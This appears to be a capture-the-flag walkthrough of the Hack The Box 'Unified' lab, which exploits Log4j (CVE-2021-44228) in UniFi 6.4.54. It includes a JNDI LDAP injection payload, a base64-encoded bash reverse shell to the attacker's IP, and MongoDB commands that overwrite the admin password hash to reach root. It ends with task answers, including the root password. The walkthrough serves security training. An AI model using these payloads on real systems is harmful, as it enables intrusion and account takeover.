#15 Unified - Starting Point - Hack The Box || Complete Walkthrough

This write-up explores the effects of exploiting Log4J in a very well-known network appliance monitoring system called "UniFi". 

This box will show you how to set up and install the necessary packages and tools to exploit UniFi by abusing the Log4J vulnerability and manipulating a POST header called to remember, giving you a reverse shell on the machine. You'll also change the administrator's password by altering the hash saved in the MongoDB instance that is running on the system, which will allow access to the administration panel and lead to the disclosure of the administrator's SSH password.


Enumeration

Click on Spawn Machine to get the target IP address:



Scan Network scan using Nmap

The first step is to scan the target IP address with Nmap to check what ports are open. Here is a quick explanation of what each flag is and what it does.

  • -sC: Performs a script scan using the default set of scripts
  • -sV: Version detection

┌─[mrdev@TS]─[~]
└──╼ $ nmap -sC -sV 10.129.73.156
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-18 04:08 IST
Nmap scan report for 10.129.73.156
Host is up (0.42s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Thu, 17 Feb 2022 17:10:01 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404 
|     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 
|     Found</h1></body></html>
|   GetRequest: 
|     HTTP/1.1 302 
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Thu, 17 Feb 2022 17:09:47 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 302 
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Thu, 17 Feb 2022 17:09:52 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Thu, 17 Feb 2022 17:09:55 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|     Request</h1></body></html>
|   Socks5: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Thu, 17 Feb 2022 17:10:03 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-title: Did not follow redirect to https://10.129.73.156:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
8443/tcp open  ssl/nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after:  2024-04-03T21:37:24
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=2/18%Time=620ECEB5%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,84,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080
SF:/manage\r\nContent-Length:\x200\r\nDate:\x20Thu,\x2017\x20Feb\x202022\x
SF:2017:09:47\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,84,"H
SF:TTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/manage\r\nCon
SF:tent-Length:\x200\r\nDate:\x20Thu,\x2017\x20Feb\x202022\x2017:09:52\x20
SF:GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x204
SF:00\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:
SF:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Thu,\x2017\x20Feb\x202022\
SF:x2017:09:55\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><ht
SF:ml\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x2
SF:0Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-family
SF::Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;ba
SF:ckground-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size
SF::16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{c
SF:olor:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:n
SF:one;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20
SF:Bad\x20Request</h1></body></html>")%r(FourOhFourRequest,24A,"HTTP/1\.1\
SF:x20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Langu
SF:age:\x20en\r\nContent-Length:\x20431\r\nDate:\x20Thu,\x2017\x20Feb\x202
SF:022\x2017:10:01\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html
SF:><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x20\xe2\x80\x9
SF:3\x20Not\x20Found</title><style\x20type=\"text/css\">body\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;
SF:background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-si
SF:ze:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20
SF:{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;border
SF::none;}</style></head><body><h1>HTTP\x20Status\x20404\x20\xe2\x80\x93\x
SF:20Not\x20Found</h1></body></html>")%r(Socks5,24E,"HTTP/1\.1\x20400\x20\
SF:r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\
SF:r\nContent-Length:\x20435\r\nDate:\x20Thu,\x2017\x20Feb\x202022\x2017:1
SF:0:03\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20l
SF:ang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x2
SF:0Request</title><style\x20type=\"text/css\">body\x20{font-family:Tahoma
SF:,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;backgroun
SF:d-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}
SF:\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:bl
SF:ack;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}</
SF:style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20
SF:Request</h1></body></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.24 seconds
┌─[mrdev@TS]─[~]
└──╼ $

The scan reveals port 8080 open running an HTTP proxy. The proxy appears to redirect requests to port 8443, which seems to be running an SSL web server. We take note that the HTTP title of the page on port 8443 is " UniFi Network ".

http://{Target IP}:8080/

Upon accessing the page using a browser we are presented with the UniFi web portal login page and the version number is 6.4.54. If we ever come across a version number it’s always a great idea to research that particular version on Google. 


Exploiting UniFi 6.4.54 with Log4j Vulnerability

A quick Google search using the keywords "UniFi 6.4.54 exploit" reveals an article that discusses the in-depth exploitation of the CVE-2021-44228 vulnerability within this application. 

  • Learn More: 

Another Log4j on the Fire: Unifi

This resource provides insights into the Log4j vulnerability's impact on the Unifi platform. It discusses the vulnerability's exploitation, its implications for Unifi users, and recommendations for mitigating the risk.


This Log4J vulnerability can be exploited by injecting operating system commands (OS Command Injection), which is a web security vulnerability that allows an attacker to execute arbitrary operating system commands on the server that is running the application and typically fully compromise the application and all its data.

To determine if this is the case, we can use Foxy Proxy after making a POST request to the /api/login endpoint, to pass on the request to BurpSuite, which will intercept it as a middle-man. The request can then be edited to inject commands. We provide a great module based on intercepting web requests.

First, we attempt to log in to the page with the credentials test, as we aren’t trying to validate or gain access. The login request will be captured by BurpSuite and we will be able to modify it.

Before we modify the request, let's send this HTTPS packet to the Repeater module of BurpSuite by pressing CTRL+R.



Gaining Reverse Shell through JNDI:LDAP Exploitation

The Exploitation section of the previously mentioned article mentions that we have to input our payload into the remember parameter. Because the POST data is being sent as a JSON object and because the payload contains brackets {}, in order to prevent it from being parsed as another JSON object we enclose it inside brackets " so that it is parsed as a string instead.

We input the payload into the remember field as shown above so that we can identify an injection point if one exists. If the request causes the server to connect back to us, then we have verified that the application is vulnerable.

"${jndi:ldap://{tun0 IP}:1389/o=tomcat}"

  • JNDI is the acronym for the Java Naming and Directory Interface API. By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.
  • LDAP is the acronym for Lightweight Directory Access Protocol, which is an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over the Internet or a Network. The default port that LDAP runs on is port 389.

After we hit "send" the "Response" pane will display the response from the request. The output shows us an error message stating that the payload is invalid, but despite the error message the payload is actually being executed. 

Let's proceed to start tcpdump on port 389, which will monitor the network traffic for LDAP connections.


Analyze the Data network using TCPDump

Tcpdump is a data-network packet analyzer computer program that runs under a command-line interface. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

 Open up another terminal and type:

┌─[mrdev@TS]─[~]
└──╼ $ sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

The above syntax can be broken down as follows:

  • sudo: Run this via root also known as admin. 
  • tcpdump: This is the program or software that is Wireshark except, it's a command-line version. 
  • -i: Selecting interface. (Example eth0, wlan0, tun0) 
  • port 389: Select the port we are listening on.

After tcpdump has been started, click again the Send button on burp suite:

The tcpdump output shows a connection being received on our machine. 

┌─[mrdev@TS]─[~]
└──╼ $ sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
05:45:17.078464 IP 10.129.73.156.59302 > 10.10.14.36.ldap : Flags [S], seq 1538469668, win 64240, options [mss 1285,sackOK,TS val 330865588 ecr 0,nop,wscale 7], length 0
05:45:17.078517 IP 10.10.14.36.ldap > 10.129.73.156.59302: Flags [R.], seq 0, ack 1538469669, win 0, length 0
^C
2 packets captured
2 packets received by filter
0 packets dropped by kernel
┌─[mrdev@TS]─[~]
└──╼ $

This proves that the application is indeed vulnerable since it is trying to connect back to us on the LDAP port 389.


Rogue-JNDI Remote Code Execution

We will have to install Open-JDK and Maven on our system in order to build a payload that we can send to the server which will give us Remote Code Execution on the vulnerable system.

Open-JDK is the Java Development Kit, which is used to build Java applications. Maven on the other hand is an Integrated Development Environment (IDE) that can be used to create a structured project and compile our projects into jar files.

Open JDK comes pre-installed with Parrot and Kali: 

sudo apt-get update
sudo apt-get install openjdk-11-jdk -y    # To Install Java 11

java --version      # Run this command to verify if java exists or not

These applications will also help us run the rogue-JNDI Java application, which starts a local LDAP server and allows us to receive connections back from the vulnerable server and execute malicious code. 

Once we have installed Open-JDK, we can proceed to install Maven. But first, let’s switch to the root user.

sudo apt-get install maven  # To install the Maven utility tool

Once we have installed the required packages, we now need to download and build the Rogue-JNDI Java application. Let's clone the respective repository and build the package using Maven.

┌─[mrdev@TS]─[~]
└──╼ $ git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi

Run the command to build the package using Maven:

┌─[mrdev@TS]─[~/rogue-jndi]
└──╼ $ sudo mvn package
[INFO] Scanning for projects...
[INFO] 
[INFO] ------------------------< RogueJndi:RogueJndi >-------------------------
[INFO] Building RogueJndi 1.1
[INFO] --------------------------------[ jar ]---------------------------------
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/2.6/maven-resources-plugin-2.6.pom
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/2.6/maven-resources-plugin-2.6.pom (8.1 kB at 2.2 kB/s)
<SNIP>
[INFO] Including org.apache.commons:commons-lang3:jar:3.9 in the shaded jar.
[INFO] Replacing original artifact with shaded artifact.
[INFO] Replacing /home/mrdev/rogue-jndi/target/RogueJndi-1.1.jar with /home/mrdev/rogue-jndi/target/RogueJndi-1.1-shaded.jar
[INFO] Dependency-reduced POM written at: /home/mrdev/rogue-jndi/dependency-reduced-pom.xml
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  06:19 min
[INFO] Finished at: 2022-02-18T06:03:17+05:30
[INFO] ------------------------------------------------------------------------
┌─[mrdev@TS]─[~/rogue-jndi]
└──╼ $

This will create a .jar file in rogue-jndi/target/ directory called RogueJndi-1.1.jar. Now we can construct our payload to pass into the RogueJndi-1-1.jar Java application.

To use the Rogue-JNDI server we will have to construct and pass it a payload, which will be responsible for giving us a shell on the affected system. We will be Base64 to encode the payload to prevent any encoding issues.

Note: For this walkthrough, we will be using port 4444 to receive the shell.

┌─[mrdev@TS]─[~/rogue-jndi]
└──╼ $ echo 'bash -c bash -i >&/dev/tcp/10.10.14.36/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMzYvNDQ0NCAwPiYxCg==
┌─[mrdev@TS]─[~/rogue-jndi]
└──╼ $

After the payload has been created, start the Rogue-JNDI application while passing in the payload as part of the --command option and your tun0 IP address to the --hostname option. 

┌─[✗]─[mrdev@TS]─[~/rogue-jndi]
└──╼ $ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMzYvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.36"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.36:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.36:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.36:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.36:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.36:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.36:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.36:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.36:1389/o=groovy to artsploit.controllers.Groovy
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

Now that the server is listening locally on port 1389, let's open another terminal and start a Netcat listener to capture the reverse shell.

┌─[mrdev@TS]─[~]
└──╼ $ nc -lvnp 4444
listening on [any] 4444 ...

Going back to our intercepted POST request and click send.

Once we receive the output from the Rogue server, a shell spawns on our Netcat listener:

┌─[mrdev@TS]─[~]
└──╼ $nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.36] from (UNKNOWN) [10.129.73.156] 49672
script /dev/null -c bash    # Upgrade the Terminal Shell that will allow us to interact with the system more  effectively
Script started, file is /dev/null
unifi@unified:/usr/lib/unifi$ id
id
uid=999(unifi) gid=999(unifi) groups=999(unifi)
unifi@unified:/usr/lib/unifi$ cat /home/michael/user.txt   # navigate to /home/Michael/ and read the user flag.
cat /home/michael/user.txt
6*****************************7
unifi@unified:/usr/lib/unifi$ 


Privilege Escalation

Now, we can get access to the administrator panel of the UniFi application and possibly extract SSH secrets used between the appliances.

unifi@unified:/usr/lib/unifi$ ps aux | grep mongo
ps aux | grep mongo
unifi         67  0.4  4.1 1104772 85176 ?       Sl   17:08   0:38 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi       4122  0.0  0.0  11468  1008 pts/0    S+   19:32   0:00 grep mongo
unifi@unified:/usr/lib/unifi$

UniFi Administrator Panel Exploitation for SSH Access

First let's check if MongoDB is running on the target system, which might make it possible for us to extract credentials in order to login into the administrative panel. We can see MongoDB is running on the target system on port 27117.

Let's interact with the MongoDB service by making use of the Mongo command-line utility and attempting to extract the administrator password.

unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
<17 ace --eval "db.admin.find().forEach(printjson);"
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
{
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : " administrator ",
"email" : "[email protected]",
"x_shadow" : " $6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4. ",
"time_created" : NumberLong(1640900495),
"last_site_name" : "default",
"ui_settings" : {
<MORE>
unifi@unified:/usr/lib/unifi$

The output reveals a user called Administrator. Their password hash is located in the x_shadow variable but in this instance, it cannot be cracked with any password-cracking utilities. Instead, we can change the x_shadow password hash with our very own created hash in order to replace the administrator's password and authenticate to the administrative panel. To do this we can use the mk passwd command-line utility.

Open a new terminal and type the below command:

┌─[mrdev@TS]─[~]
└──╼ $ mkpassswd -m sha-512 technoscience      # Instead of technoscience change to new password
$6$wxJKtlbnsXvPeyv.$eH8MH1mkoK.Dtogovb60jvIzrRLEgpTVUJe30K5jOmrJayQoSNhDTkzRGLdE/KvsVq.H7R3BBXUQIh6LvmP1k1
┌─[mrdev@TS]─[~]
└──╼ $

Once we've generated the SHA-512 hash the output will look similar to the one above, however, due to the salt, the hash will change every time it is generated.

A salt is added to the hashing process to force their uniqueness, increase their complexity without increasing user requirements, and to mitigate password attacks like hash tables.

Let's proceed to replace the existing hash with the one we created:

mongo --port 27117 ace --eval 'db.admin.update({"_id":
ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"SHA_512 Hash Generated"}})'

unifi@unified:/usr/lib/unifi$ mongo --port 27117 ace --eval 'db.admin.update({"_id":
ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$wxJKtlbnsXvPeyv.$eH8MH1mkoK.Dtogovb60jvIzrRLEgpTVUJe30K5jOmrJayQoSNhD<go --port 27117 ace --eval 'db.admin.update({"_id":
<OmrJayQoSNhDTkzRGLdE/KvsVq.H7R3BBXUQIh6LvmP1k1"}})'
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/ace
MongoDB server version: 3.6.3
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })
unifi@unified:/usr/lib/unifi$

Let's now visit the website and log in as administrators. It is very important to note that the username is case-sensitive.

The authentication process was successful and we now have administrative access to the UniFi application.

UniFi offers a setting for SSH Authentication, which is a functionality that allows you to administer other Access Points over SSH from a console or terminal.

Navigate to settings -> site , scroll down to find the SSH Authentication setting. SSH authentication with a root password has been enabled.

The page shows the root password in plaintext. Let's attempt to authenticate to the system as root over SSH. 

┌─[mrdev@TS]─[~]
└──╼ $ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


root@unified:~# ls
root.txt
root@unified:~# cat root.txt
e**************************1
root@unified:~# 

Congratulations, you have finished the Unified box.


TASK Solutions


TASK 1: What ports are open?

Ans. 22,6789,8080,8443

TASK 2: Name of the software that is running on the highest port?

Ans. UniFi Network

TASK 3: What is the version of the software that is running?

Ans. 6.4.54

TASK 4: What is the CVE for the identified vulnerability?

Ans. CVE-2021-44228

TASK 5: What is the version of Maven that we installed?

Ans. 3.6.3

TASK 6: What protocol does JDNI leverage in the injection?

Ans. LDAP

TASK 7: What tool do we use to intercept the traffic, indicating the attack was successful?

Ans. tcpdump

TASK 8: What port do we need to inspect intercepted traffic for?

Ans. 389

TASK 9: What port is the MongoDB service running on?

Ans. 27117

TASK 10: What is the default database name for UniFi applications?

Ans. ace

TASK 11: What is the function we use to enumerate users within the database in MongoDB?

Ans. db.admin.find()

TASK 12: What is the function to add data to the database in MongoDB?

Ans. db.admin.insert()

TASK 13: What is the function we use to update users within the database in MongoDB?

Ans. db.admin.update()

TASK 14: What is the password for the root user?

Ans. NotACrackablePassword4U2022


Post a Comment

2 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.
  1. Dear Team

    could we to see your video other youtube , because we see the youtube your account has been suspended , could we to get your email or email me to [email protected]

    ReplyDelete

If you have any doubts or any queries you can specify here.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!